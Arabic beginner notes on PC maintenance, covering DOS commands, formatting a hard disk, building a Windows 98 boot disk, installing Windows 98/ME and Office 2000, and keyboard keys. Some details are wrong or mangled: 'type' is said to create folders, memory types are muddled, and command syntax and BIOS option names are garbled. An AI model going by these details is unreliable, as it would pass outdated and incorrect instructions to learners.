2 قبل البدء في صيانة الجهاز من الداخل عليك تفريغ الشحنات الكهربائية في جسمك.
3 هناك نوعان من الذواكر :
أ الذاكرة العشوائية : وهي التي تفقد المعلومات عند انقطاع التيار الكهربائي
ب الذاكرة الدائمة : وهي التي تحتفظ بالمعلومات عند انقطاع التيار
الكهربائي والسبب ـ وجود بطارية تشحنها حين انقطاع التيار الكهربائي.
4 المنافذ المتسلسلة : وهي التي تنقل البيانات بشكل بت بت .
5 المنافذ المتوازية : وهي التي تنقل البيانات بشكل بايت بايت .

نظام التشغيل
1 المقدمة 2 إصدارات النظام 3 أوامر التشغيل
4 خطوات التشغيل للنظام ، محث النظام : هو الموقع الذي يتم عنده إدخال الأوامر.

 برامج أنظمة التشغيل من إنتاج شركة مايكروسوفت :
1 نظام التشغيل (6.22) MS-DOS .
2 نظام تشغيل النوافذ WINDOS 3.11 .
3 نظام تشغيل WINDOS 95 .
4 نظام تشغيل WINDOS 98 .
5 نظام تشغيل WINDOS ME ـ ملينيوم .
6 نظام تشغيل WINDOS XP .
 ملاحظة : يوجد نوعين من إصدار الويندوز :
أ نسخة تطويرية UP GRADE وهي نسخة لتحديث ويندوز سابق قديم إلى أحدث منه مثل : من WIN95 إلى WIN98 .
ب نسخة كاملة ( إصدار كامل ) يسمى FULL VERSION وهي ليست بحاجة لوجود نظام سابق يتم تحديثه إنما يحمل مباشرة .




 تقسيم أوامر الدوس ( DOS ) :

الأمر معنـاه الأمر معنـاه
أوامـــر النظـــام
date لتغير اليوم cls لمسح الشاشة
time لتغير الوقت ver لمعرفة الإصدار
أوامــر الهـاردسك
dir لاستعراض المحتويات cd للدخول للمجلد
MD لإنشاء مجلد cd.. للخروج من المجلد
أوامــر الملفــات
Copy لنسخ الملفات Del لحذف الملفات
type لإنشاء المجلدات

 الملف file :
الملف يتكون من جزأين اسم أساسي ( لا يتجاوز 8 أحرف، اسم ممتد لا يتجاوز 3 أحرف .
 المجلد : هو عبارة عن عمليه تنظيمية للملفات الموجودة في الجهاز.
 محث النظام = <C:\



 الخطوات التي لابد أن تعمل قبل إجراء عملية الفورمات هي
1 إنشاء قرص بدء التشغيل .
2 حفظ الملفات المهمة في القسم الآخر من الهاردسك مثل : D ، E ، F …
3 نفل الملفات الموجودة في مجلد المستندات إلى القسم D مثلاً .
4 سطح المكتب يعتبر جزء من محتويات المجلد WINDOS فلا تحفظ أي شيء على سطح المكتب ، أنشئ مجلد خاص وسمه ثم احفظ عملك فيه .
5 محاولت إصلاح النظام قبل عملية الفورمات ونجعلها آخر حل للمشاكل .
6 أخذ أسماء التعاريف مثلاً : لكرت الصوت ، كرت الشاشة ، كرت الفاكس مودم .



 طريقة إنشاء قرص بدأ التشغيل WINDOS 98 .
1 نفتح قائمة ابدأ ــ إعدادات ــ لوحة التحكم ــ إضافة أو إزالة البرامج
ــ قرص بدأ التشغيل ــ ننقر على زر إنشاء قرص ــ هنا يتم التحضير لنسخ
ملفات بدأ التشغيل ــ نقوم بإدخال قرص مرن ــ نختار موافق وبطلب الحاسب
قرص ليزري يحوي على نظام WINDOS 98 .
 فائدة قرص بدأ التشغيل :
1 يتم الإقلاع من القرص لتحميل نظام التشغيل WINDOS98 .
2 في حالة حدوث مشكلة في نظام التشغيل يتم حلها باستخدام قرص بدأ التشغيل .
 ملاحظة :
للإقلاع من قرص بدأ التشغيل يجب الدخول إلى نظام SETUP للجهاز بالضغط على مفتاح DEL وإجراء التالي:
1 نختار الخيار Bios feature setup .
2 نضع boot sequin .
3 نضع الخيار boot up floppy seek/ enable .


تعريف الهاردسك
 يعرف الهاردسك من خلال لوحة SETUP .
 تستطيع معرفة الوقت والتاريخ ودرجة الحرارة للجهاز من خلال SETUP .
 نستطيع وضع كلمة مرور على لوحة setup وكذلك على النظام win98 .



تحميل نظام التشغيل windos98 / windosme
1 عند توصيل القرص الصلب يتم تعريفه في setup
2 نضع قرص بدأ التشغيل في سواقة الأقراص المرنة .
3 محث dos نقوم بتقسيم الهاردسك إلى أجزاء مثل C ، D،E…
4 بعدها نقوم بتهيئة كل جزء تم إنشاءه بإجراء عملية الفورمات وهي كالتالي :
أ العملية هي فورمات كامل بطيء Format C:<A:\
ب العملية هي فورمات كامل سريع FORMAT C:/q<A:\
ج العملية هي فورمات كامل بطي مع تحميل ملفات النظام Format C:/S/U<A:\
ملاحظة : الجزء الفعال من القرص الصلب يحمل عليه النظام يسمى
Primary Partion.
5 بعد الانتهاء من تهيئة الأقسام التي تم إنشاؤها ندخل قرص بدأ التشغيل ونختار إقلاع مع ال CD-ROOM ونقوم بتحميل نظام التشغيل .
6 نضع قرص ليزري يحتوي على نظام التشغيل WINDOD98.
7 نكتب الأمر ( المسار ) التالي :WIN98\LOC\SETUP <A:/ للويندوز 98
أما بالنسبة لويندوز me : WIN9X\LOC\SETUP <A:/
8 تظهر بعده شاشة لإجراء عملية التفحص للأقراص نضغط بعده على ENTER .
9 تظهر شاشات متتابعة نضغط على زر Enter إلى أن نصل إلى شاشة خيار الإعداد
الأمثل ــ محمول ــ مضغوط ــ مخصص ، نختار أمثل ونستمر في العملية .
10 بعدها يستغرق وقت قرابة 20 دقيقة ثم يطلب منك الرقم ( المفتاح ) المرخص
النظام بعد ذلك يكمل نظام التشغيل التحميل أثناء ذلك يعيد الحاسب تشغيل
نفسه عدة مرات .





 كيفية تعريف كرت في الحاسب :
1 بعد الانتهاء من تحميل نظام ويندوز 98 يجب تعريف كل كرت موجود أو أي جهاز وموصل بالحاسب منها :
أ تعريف كرت الشاشة VGA CARD .
ب تعريف كرت صوت SOUND CARD .
ج تعريف كرت فاكس / مودم FAX /MODEM .
د تعريف طابعة PRINER .

ملاحظات هامة

 أحياناً يكون الكرت من نوع PLAY أي أن الجهاز يستطيع أن يعرف الكرت بنفسه مباشرة لأنه موجود في مكونات WIN98 أو WIN9X .
 يأتي مع كل كرت عادة CD-ROOM أو FLOPPY DISK لتعريفه على النظام المحمل عندك .
 يمكن معرفة نوع الكرت من خلال الاسم المكتوب على أكبر مقطع ( دائرة متكاملة ) موجدة على الكرت .


تحميل شريط الأوفس Microsoft Office
1 نضع قرص الأوفيس مثلً 2000 يشتغل تلقائياُ فتظهر علامة الترحيب ثم بعد ذلك تأتي شاشة المفتاح الرقم للنسخة فنكتبه .
2 بعد ذلك تأتي شاشة الاتفاقية ثم بعدها نختار فيما إذا كنا نريد أن نحمل أفس لوحده أم مع نسخة سابقة .
3 ثم بعد ذلك نقوم بالتثبيت للأفس بعدها يطلب إعادة التشغيل ثم يخمل الباقي منه ثم ينتهي التحميل للأفس .
4 يتم التحكم بشريط الأفس وذلك بالزر الأيمن على الشريط ثم اختيار قائمة تخصيص من خلالها يتم التحكم .
 وظائف لبعض الأزرار :
1 delete ويستخدم للمسح أو الحذف .
2 page up ويستخدم للصعود لأعلى صفحة واحدة .
3 page down ويستخدم للنزول لأسفل شاشة واحدة .
4 F1 وهو للتعليمات .
5 F5 وهو للتحديث العناصر .
6 HOME للذهاب لأول الصفحة أو المستند .
7 END للذهاب لآخر الصفحة أو المستند .
8 NUM LOCK وهو للتحكم بالأزرار التي في الجهة اليمنى .
9 Ctrl + Del + Alt وهو لإغلاق الجهاز أو أي برنامج فيه مشكلة .
10 ESC وهو مفتاح الهروب .
11 Back space وهو مفتاح للإزالة والحذف حرف حرف .
13 Enter وهو مفتاح لتفعيل الأوامر عند الضغط عليه .